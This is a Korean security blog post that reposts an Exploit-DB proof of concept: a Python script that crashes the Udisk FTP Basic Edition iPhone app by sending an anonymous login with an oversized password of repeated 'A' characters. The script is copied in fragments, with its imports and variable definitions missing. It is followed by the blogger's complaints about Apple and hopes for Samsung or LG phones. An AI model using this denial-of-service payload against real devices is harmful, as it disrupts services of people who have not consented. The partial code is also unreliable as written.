iPhone을 달갑게 여기지 않는 사람이기 때문에 자세하게는 모른다.
간단한 조사과 다른 블로그를 참고한 결과 Udisk라는 어플을 사용 할 때 존재하는 Exploit인것 같다.
Udisk FTP Basic Edition는 iPhone을 FTP서버로 사용하게 도와주는 App인것 같으며,
FTP서버에 anonymous라는 ID와 0x41(2047개)라는 Pass로 접속하여 '버퍼오버플로우'를 노린것으로 보인다.
원본 : http://www.exploit-db.com/exploits/11117
# Title: Apple Iphone/Ipod - Udisk FTP Basic Edition Remote 0day DoS Exploit
# EDB-ID: 11117
# CVE-ID: (
)
# OSVDB-ID: (
)
# Author: mr_me
# Published: 2010-01-12
# Verified: yes
# Download
Exploit Code
# Download N/A
print "|------------------------------------------------------------------|" |
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |" |
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |" |
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |" |
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |" |
print "| http://www.corelan.be:8800 |" |
print "| security@corelan.be |" |
print "|-------------------------------------------------[ EIP Hunters ]--|" |
print "[+] Apple Iphone/Ipod - Udisk FTP basic edition Remote DOS exploit" |
print ( "Usage: ./udisk.py <serv_ip>\n" ) |
print ( "Example:./udisk.py 192.168.2.3\n" ) |
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
sock.connect((hostname, 8080 )) |
print "[+] Connecting to the target.." |
print ( "[-] Connection error!" ) |
print "[+] Sending payload.. ph33r" |
sock.send( "USER %s\r\n" % username) |
sock.send( "PASS %s\r\n" % passwd) |
print "[+] Server is now DOS'ed!" |
이러한 문제점이 있는데,,
왠지 쉬쉬하고 있는 느낌이 드는 애플이 가증스럽게 느껴지는군요,,
안그래도 유럽이나 미주에서 유행 반짝하고 나서 우리나라에 출시한것도 기분나쁜뎅,,
하루빨리 삼성이나 LG에서 쌈박한 무언가가 나왔으면 좋겠습니다.
LG에서 새로나온 MAXX가 칩셋이 워낙 짱짱해서 하드웨어적인 면은 좋다고 하던뎅,,(물론 스마트폰이 아니지만요,,:p)
출처 : 뎅꽁이의 보안창고
http://boanchanggo.tistory.com/